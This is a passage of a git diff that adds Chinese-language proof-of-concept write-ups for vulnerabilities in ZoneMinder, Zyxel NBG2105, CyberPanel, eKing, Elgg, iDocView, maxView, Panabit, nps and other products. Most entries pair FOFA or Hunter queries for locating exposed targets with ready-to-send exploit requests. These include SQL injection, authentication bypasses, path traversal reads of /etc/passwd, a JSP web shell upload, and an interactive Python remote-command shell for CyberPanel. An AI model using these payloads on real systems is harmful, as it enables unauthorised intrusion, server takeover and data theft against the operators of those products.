+![1723565739853-847ffea8-1b37-4464-8fc9-d7eb118b9464.png](./img/9-95EQiI1gJfYq-3/1723565739853-847ffea8-1b37-4464-8fc9-d7eb118b9464-900395.png)
+
+# 四、漏洞复现
+```plain
+GET /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+```
+
+
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gore50bddk9vgsxg>
\ No newline at end of file
diff --git a/ZoneMinder系统sort接口存在SQL注入漏洞.md b/ZoneMinder系统sort接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..b89aa1d
--- /dev/null
+++ b/ZoneMinder系统sort接口存在SQL注入漏洞.md
@@ -0,0 +1,14 @@
+# ZoneMinder系统sort接口存在SQL注入漏洞
+
+ZoneMinder 是一款免费、开源的闭路电视软件应用程序，专为 Linux 开发，支持 IP、USB 和模拟摄像机。
+
+## poc
+
+```java
+http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
+```
+
+```java
+http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request
+```
+
diff --git a/ZyxelNBG2105身份验证绕过.md b/ZyxelNBG2105身份验证绕过.md
new file mode 100644
index 0000000..06f6626
--- /dev/null
+++ b/ZyxelNBG2105身份验证绕过.md
@@ -0,0 +1,27 @@
+# Zyxel NBG2105身份验证绕过
+
+# 一、漏洞简介
+在Zyxel NBG2105 V1.00（AAGU.2）C0设备上，将登录cookie设置为1可提供管理员访问权限。
+
+# 二、影响版本
++ Zyxel NBG2105
+
+# 三、资产测绘
++ fofa`app="ZyXEL-NBG2105"`
++ 特征
+
+![1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b.png](./img/8b_DE99WV4FLOPh1/1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b-935700.png)
+
+# 四、漏洞复现
+直接访问如下poc即可绕过身份验证进入后台
+
+```plain
+/login_ok.htm
+```
+
+![1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829.png](./img/8b_DE99WV4FLOPh1/1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829-508453.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ofagy15qnxr8eg9f>
\ No newline at end of file
diff --git a/cyberpanel未授权远程命令执行漏洞.md b/cyberpanel未授权远程命令执行漏洞.md
new file mode 100644
index 0000000..8371153
--- /dev/null
+++ b/cyberpanel未授权远程命令执行漏洞.md
@@ -0,0 +1,73 @@
+# cyberpanel未授权远程命令执行漏洞
+
+​	CyberPanel是一个开源的Web控制面板，它提供了一个用户友好的界面，用于管理网站、电子邮件、数据库、FTP账户等。CyberPanel旨在简化网站管理任务，使非技术用户也能轻松管理自己的在线资源。
+
+​	**CyberPanel upgrademysqlstatus 远程命令执行漏洞(QVD-2024-44346)**，该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。
+
+## 影响范围
+
+CyberPanel v2.3.5 
+
+CyberPanel v2.3.6
+
+## fofa
+
+```javascript
+app="CyberPanel"
+```
+
+## poc
+
+```javascript
+OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+Content-Type: application/json
+Connection: close
+
+{"statusfile":"/dev/null; id; #"}
+```
+
+```python
+import httpx 
+import sys 
+
+def get_CSRF_token(client):
+    resp = client.get("/")
+    
+    return resp.cookies['csrftoken']
+    
+def pwn(client, CSRF_token, cmd):
+    headers = {
+        "X-CSRFToken": CSRF_token,
+        "Content-Type":"application/json",
+        "Referer": str(client.base_url)
+    }
+    
+    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
+    
+    return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]
+    
+def exploit(client, cmd):
+    CSRF_token = get_CSRF_token(client)
+    stdout = pwn(client, CSRF_token, cmd)
+    print(stdout)
+    
+if __name__ == "__main__":
+    target = sys.argv[1]
+    
+    client = httpx.Client(base_url=target, verify=False)
+    while True:
+        cmd = input("$> ")
+
+        exploit(client, cmd)
+```
+
+![image-20241029095124852](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290951933.png)
+
+![image-20241029095144766](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410290951820.png)
+
+## 漏洞来源
+
+- https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
+- https://mp.weixin.qq.com/s/sUARVHbwH1UZDXB-CF2z1w
\ No newline at end of file
diff --git a/eking管理易Html5Upload接口存在任意文件上传漏洞.md b/eking管理易Html5Upload接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..5e7e7d6
--- /dev/null
+++ b/eking管理易Html5Upload接口存在任意文件上传漏洞.md
@@ -0,0 +1,68 @@
+# eking管理易Html5Upload接口存在任意文件上传漏洞
+
+eking管理易Html5Upload接口存在任意文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传任意文件，在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```yaml
+app="EKing-管理易"
+```
+
+## poc
+
+创建临时文件
+
+```yaml
+POST /Html5Upload.ihtm HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+comm_type=INIT&sign_id=shell&vp_type=default&file_name=../../shell.jsp&file_size=2048
+```
+
+写入文件内容
+
+```jinja2
+POST /Html5Upload.ihtm HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
+Connection: close
+
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="comm_type"
+
+DATA
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="sign_id"
+
+shell
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="data_inde"
+
+0
+------WebKitFormBoundaryj7OlOPiiukkdktZR
+Content-Disposition: form-data; name="data"; filename="chunk1"
+Content-Type: application/octet-stream
+
+<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+------WebKitFormBoundaryj7OlOPiiukkdktZR--
+```
+
+保存文件
+
+```javascript
+POST /Html5Upload.ihtm HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+comm_type=END&sign_id=shell&file_name=../../shell.jsp
+```
+
+![image-20241012132747292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327356.png)
+
+![image-20241012132754554](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121327613.png)
\ No newline at end of file
diff --git a/elgg-sqli.md b/elgg-sqli.md
new file mode 100644
index 0000000..115768c
--- /dev/null
+++ b/elgg-sqli.md
@@ -0,0 +1,14 @@
+## Elgg 5.1.4 Sql Injection
+
+## fofa
+```
+icon_hash="413602919"
+```
+## poc
+```
+GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
+Host: 
+```
+
+## Ref
+- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
\ No newline at end of file
diff --git a/hi-bridge网关download存在文件读取漏洞.md b/hi-bridge网关download存在文件读取漏洞.md
new file mode 100644
index 0000000..4dd2106
--- /dev/null
+++ b/hi-bridge网关download存在文件读取漏洞.md
@@ -0,0 +1,31 @@
+# hi-bridge网关download存在文件读取漏洞
+
+# 一、漏洞简介
+hi-bridge网关download存在文件读取漏洞
+
+# 二、影响版本
++ hi-bridge网关
+
+# 三、资产测绘
+```plain
+title="HA Bridge"
+```
+
+![1716312169799-4fd5856c-56e1-426d-a253-9230ae522398.png](./img/qezHCxCNYkbHMxcn/1716312169799-4fd5856c-56e1-426d-a253-9230ae522398-746647.png)
+
+# 四、漏洞复现
+```plain
+PUT /api/devices/backup/download HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 
+
+
+{"filename":"../../../../etc/passwd"}
+```
+
+![1716312291501-52489ea0-9fd1-4509-bf55-917a14eaf026.png](./img/qezHCxCNYkbHMxcn/1716312291501-52489ea0-9fd1-4509-bf55-917a14eaf026-796584.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aat3gchwm23g4rhd>
\ No newline at end of file
diff --git a/iDocView-upload接口任意文件读取.md b/iDocView-upload接口任意文件读取.md
new file mode 100644
index 0000000..2d63cba
--- /dev/null
+++ b/iDocView-upload接口任意文件读取.md
@@ -0,0 +1,18 @@
+## iDocView upload接口任意文件读取
+ iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞，未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息，使系统处于极度不安全的状态。 
+
+## 资产测绘
+```
+Hunter语法：
+app.name="I Doc View"
+Fofa语法：
+title="I Doc View"
+```
+
+## poc
+```
+http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt
+```
+![image](https://github.com/wy876/POC/assets/139549762/01f5a3a7-9cd3-45bc-beb0-5cd6ab800171)
+
+![image](https://github.com/wy876/POC/assets/139549762/0e549cdd-9c98-41b5-874d-8a159cf3db19)
diff --git a/iKuai流控路由SQL注入漏洞.md b/iKuai流控路由SQL注入漏洞.md
new file mode 100644
index 0000000..1ee4c70
--- /dev/null
+++ b/iKuai流控路由SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# iKuai 流控路由 SQL注入漏洞
+
+# 一、漏洞简介
+iKuai 流控路由 存在SQL注入漏洞，可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限。
+
+# 二、影响版本
++ iKuai 流控路由
+
+# 三、资产测绘
++ fofa`title="登录爱快流控路由"`
++ 特征
+
+![1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f.png](./img/YBuf94WmdVDpk4Za/1708141838923-2e73c81d-9305-4108-a974-55314dbcd36f-143487.png)
+
+# 四、漏洞复现
+使用万能密码登陆系统
+
+```java
+user: "or""=""or""="
+pass: 空
+```
+
+![1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213.png](./img/YBuf94WmdVDpk4Za/1708141888537-0e90ab4f-9fcc-4f83-9bb5-3b00d2207213-683464.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kx86t3hwzf40pktl>
\ No newline at end of file
diff --git a/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md b/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md
new file mode 100644
index 0000000..e294678
--- /dev/null
+++ b/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md
@@ -0,0 +1,24 @@
+# imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞
+
+imo云办公室由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严，导致可以读取系统敏感文件
+
+## fofa
+
+```javascript
+app="IMO-云办公室"
+```
+
+## poc
+
+```javascript
+GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+```
+
+![imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111031851.png)
\ No newline at end of file
diff --git a/laravel开启debug模式信息泄露漏洞.md b/laravel开启debug模式信息泄露漏洞.md
new file mode 100644
index 0000000..01acf10
--- /dev/null
+++ b/laravel开启debug模式信息泄露漏洞.md
@@ -0,0 +1,30 @@
+# laravel开启debug模式信息泄露漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">laravel因配置不当会泄露MySQL，Redis，Elastic，Mongodb，neo4j，postgresql，SQLServer，Oracle，Firebird，sqlite，mail账号密码和APP</font><font style="color:rgb(215, 186, 125);">\_</font><font style="color:rgba(0, 0, 0, 0.9);">KEY等敏感信息。黑客可以利用这些信息进行脱库，或者在服务器植入后门，也可以利用数据库服务器进行跳板入侵内网其他重要服务器。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">laravel</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name=="Laravel Default Page"`
++ 特征
+
+![1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2.png](./img/P88NvAGGM0PZp2co/1706028497800-b50dcfba-e08c-49ee-889a-d5366a7c5da2-494849.png)
+
+# 四、漏洞复现
+```plain
+PUT /index.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate
+Content-Length: 0
+```
+
+![1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f.png](./img/P88NvAGGM0PZp2co/1706028548504-9391ce93-a3e2-469c-b68a-430122c7597f-688243.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tgvd9mmhbtzgbv2k>
\ No newline at end of file
diff --git a/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md b/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md
new file mode 100644
index 0000000..fba63b9
--- /dev/null
+++ b/linglong扫描系统存在JWT密钥硬编码登录绕过漏洞.md
@@ -0,0 +1,46 @@
+# linglong扫描系统存在JWT密钥硬编码登录绕过漏洞
+
+# 一、漏洞简介
+linglong扫描系统 存在密钥硬编码漏洞，未经身份验证验证得攻击者可构造JWT密钥绕着身份认证直接登录系统后台，造成信息泄露，使系统处于极不安全的状态。
+
+# 二、影响版本
++ linglong扫描系统
+
+# 三、资产测绘
++ fofa`icon_hash="684115083"`
++ 特征![1715938593763-5eb42a99-7424-48f3-9a08-2a19f8d41a80.png](./img/TdJAfNn7rXunQrWH/1715938593763-5eb42a99-7424-48f3-9a08-2a19f8d41a80-600755.png)
+
+# 四、漏洞复现
+1、登陆时抓包
+
+![1715938889113-723830d7-8a12-4e5b-b91e-6543f792e612.jpeg](./img/TdJAfNn7rXunQrWH/1715938889113-723830d7-8a12-4e5b-b91e-6543f792e612-800818.jpeg)
+
+2、拦截返回包
+
+![1715938893647-287318dd-1f8b-4da2-81a3-7ee9b1bcd887.jpeg](./img/TdJAfNn7rXunQrWH/1715938893647-287318dd-1f8b-4da2-81a3-7ee9b1bcd887-481183.jpeg)
+
+3、替换返回包为如下内容：
+
+![1715938907183-713ef226-8b05-487e-a848-14919f3f7be4.jpeg](./img/TdJAfNn7rXunQrWH/1715938907183-713ef226-8b05-487e-a848-14919f3f7be4-695767.jpeg)
+
+```plain
+HTTP/1.1 200 OK
+Access-Control-Allow-Credentials: true
+Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization,Token,X-TOKEN
+Access-Control-Allow-Methods: POST, GET,PUT, DELETE, OPTIONS
+Access-Control-Allow-Origin: *
+Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
+Content-Type: application/json; charset=utf-8
+Date: Fri, 17 May 2024 09:39:26 GMT
+Content-Length: 43
+Connection: close
+
+{"code":200,"data":{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxIiwiZXhwIjoxOTk5OTk5OTk5LCJpc3MiOiJsaW5nbG9uZyJ9.xAJf-cktK9WD5vXpfwTaIs6fSqVGZfG5BGnqDZwruMY"},"msg":"请求失败"}
+```
+
+![1715938718868-db511db4-0fa4-4453-b8a0-37ae18e96300.png](./img/TdJAfNn7rXunQrWH/1715938718868-db511db4-0fa4-4453-b8a0-37ae18e96300-390634.png)
+
+
+
+> 更新: 2024-05-18 12:32:23  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pb37q4h4d15zfwg1>
\ No newline at end of file
diff --git a/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md b/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md
new file mode 100644
index 0000000..67974e0
--- /dev/null
+++ b/maxViewStorageManager系统dynamiccontent.properties.xhtml远程代码执行漏洞.md
@@ -0,0 +1,32 @@
+# maxView Storage Manager 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
+
+# 一、漏洞简介
+maxView Storage Manager 是一款企业存储和通信解决方案的管理系统。maxView Storage Manager 存在代码执行漏洞，攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获取服务器权限。 
+
+# 二、影响版本
++ maxView Storage Manager 系统
+
+# 三、特征
++ fofa`title="maxView Storage Manager -Login"`
++ 特征
+
+![1711170206968-8730e701-b28e-4f8c-b76e-7ec656da2137.png](./img/AaQLbnI0UgxJhLrz/1711170206968-8730e701-b28e-4f8c-b76e-7ec656da2137-269947.png)
+
+# 四、漏洞复现
+```plain
+POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+Connection: close
+ 
+pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=ipconfig
+```
+
+![1711170266996-7fc35e2e-adcf-4ef6-9055-ce2d8ca62b39.png](./img/AaQLbnI0UgxJhLrz/1711170266996-7fc35e2e-adcf-4ef6-9055-ce2d8ca62b39-666053.png)
+
+
+
+> 更新: 2024-04-16 16:53:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oqknqwns4swn7n8n>
\ No newline at end of file
diff --git a/npsauth_key未授权访问漏洞.md b/npsauth_key未授权访问漏洞.md
new file mode 100644
index 0000000..d8af95a
--- /dev/null
+++ b/npsauth_key未授权访问漏洞.md
@@ -0,0 +1,59 @@
+# nps auth_key未授权访问漏洞
+
+# 一、漏洞简介
+nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。其中auth_key 存在未授权访问漏洞，当 nps.conf 中的 auth_key 未配置时攻击者通过生成特定的请求包可以获取服务器后台权限。
+
+# 二、影响版本
++ nps
+
+# 三、资产测绘
+hunter：`app.name=="NPS"`
+
+![1690905321342-d3f07968-0b21-4f33-9fdc-6e0aadc8ac40.png](./img/ZDr_BBe5Bm_qQnLI/1690905321342-d3f07968-0b21-4f33-9fdc-6e0aadc8ac40-275845.png)
+
+登陆页面：
+
+![1690905349347-b1e10017-8bea-4fb1-94d8-7a5278399643.png](./img/ZDr_BBe5Bm_qQnLI/1690905349347-b1e10017-8bea-4fb1-94d8-7a5278399643-811855.png)
+
+# 四、漏洞复现
+nps认证方式是通过配置文件nps.conf中的auth_key与timestamp的md5形式进行认证，但在默认的配置文件中，auth_key 默认被注释，所以只需要可以获取到的参数 timestamp 就可以绕过认证登录。
+
+```java
+import time
+import hashlib
+now = time.time()
+m = hashlib.md5()
+m.update(str(int(now)).encode("utf8"))
+auth_key = m.hexdigest()
+ 
+print("Index/Index?auth_key=%s&timestamp=%s" % (auth_key,int(now)))
+```
+
+![1690906026443-b70fe018-f2d0-4d67-bb7f-5a4e2bd3da2a.png](./img/ZDr_BBe5Bm_qQnLI/1690906026443-b70fe018-f2d0-4d67-bb7f-5a4e2bd3da2a-278432.png)
+
+成功绕过进入后台
+
+![1690906058460-277b73fc-8982-41f6-85d4-c592b09b36ed.png](./img/ZDr_BBe5Bm_qQnLI/1690906058460-277b73fc-8982-41f6-85d4-c592b09b36ed-607784.png)
+
+NPS存在一个身份验证的缺陷，无需登录，直接进后台，后台功能点全都可以用。具体利用是伪造两个参数auth_key、timestamp。由于参数的生命周期只有20秒，20秒过后就需要重新伪造，故采用burp插件。
+
+插件所有的功能集成到了Burp的右键中：
+
+1、首先访问nps站点，拦截请求包，启用插件 
+
+![1690906445748-6ff0e472-4657-46e8-b19f-3377b92716b1.png](./img/ZDr_BBe5Bm_qQnLI/1690906445748-6ff0e472-4657-46e8-b19f-3377b92716b1-763743.png)
+
+![1690906483905-89f648c9-f7d9-41d1-ac1a-2c4b5936d37f.png](./img/ZDr_BBe5Bm_qQnLI/1690906483905-89f648c9-f7d9-41d1-ac1a-2c4b5936d37f-940880.png)
+
+2、点击“查看仪表盘”会修改请求包，之后直接放行数据包成功登陆后台，后续每一个请求都会自动贴上身份验证参数。
+
+![1690906698049-f5763516-c353-4ed2-b6fb-ec146d5308c7.png](./img/ZDr_BBe5Bm_qQnLI/1690906698049-f5763516-c353-4ed2-b6fb-ec146d5308c7-679499.png)
+
+![1690906762480-40576cdf-6b8b-4bdb-9def-d9e6f5e63ff1.png](./img/ZDr_BBe5Bm_qQnLI/1690906762480-40576cdf-6b8b-4bdb-9def-d9e6f5e63ff1-086832.png)
+
+
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pxqopzr7q1gwysu2>
\ No newline at end of file
diff --git a/omfyUI-follow_symlinks文件读取漏洞.md b/omfyUI-follow_symlinks文件读取漏洞.md
new file mode 100644
index 0000000..af5da6a
--- /dev/null
+++ b/omfyUI-follow_symlinks文件读取漏洞.md
@@ -0,0 +1,11 @@
+## omfyUI follow_symlinks文件读取漏洞
+
+## fofa
+```
+app="ComfyUI"
+```
+
+## poc
+```
+http://ip:8188/../../../../../../../../../../../../../../etc/passwd
+```
diff --git a/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md b/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md
new file mode 100644
index 0000000..c09d55b
--- /dev/null
+++ b/panabit日志审计系统mailcious_down_fornode远程命令执行漏洞.md
@@ -0,0 +1,49 @@
+# panabit日志审计系统mailcious_down_fornode远程命令执行漏洞
+
+# 一、漏洞简介
+panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。panabit日志审计系统mailcious_down_fornode远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ Panabit panalog
+
+# 三、资产测绘
++ hunter`app.name="Panabit 日志系统"`
++ 特征
+
+![1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f.png](./img/PDxyT-yAQSiNXykj/1699191878681-4fe56d76-6ee5-4a90-af37-1cf8a983f57f-247645.png)
+
+# 四、漏洞复现
+```java
+POST /mailcious_down_fornode.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+Content-Length: 40
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+X-Forwarded-For: 127.0.0.1,192.168.170.105,172.10.107.143
+
+action=check&uuid=;whoami > pobjejsh.txt
+```
+
+![1708524892745-3b5bf667-ecd6-4a9b-bbce-5c21566165de.png](./img/PDxyT-yAQSiNXykj/1708524892745-3b5bf667-ecd6-4a9b-bbce-5c21566165de-715574.png)
+
+获取命令执行结果
+
+```java
+GET /pobjejsh.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
+Connection: close
+Content-Type: text/plain
+Accept-Encoding: gzip, deflate
+```
+
+![1708524929552-5534bed2-5da0-4c33-a551-21bc90dbe0ec.png](./img/PDxyT-yAQSiNXykj/1708524929552-5534bed2-5da0-4c33-a551-21bc90dbe0ec-650538.png)[panabit-mailcious-down-fornode-远程命令执行.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222233874-8275a922-bf36-45a6-b083-4536ea247db0.yaml)
+
+
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkhnzs3bu0s8zxxn>
\ No newline at end of file
diff --git a/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md b/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md
new file mode 100644
index 0000000..781cc6e
--- /dev/null
+++ b/panabit日志审计系统sprog_deletevent存在SQL注入漏洞.md
@@ -0,0 +1,57 @@
+# panabit日志审计系统sprog_deletevent存在SQL注入漏洞
+
+# 一、漏洞简介
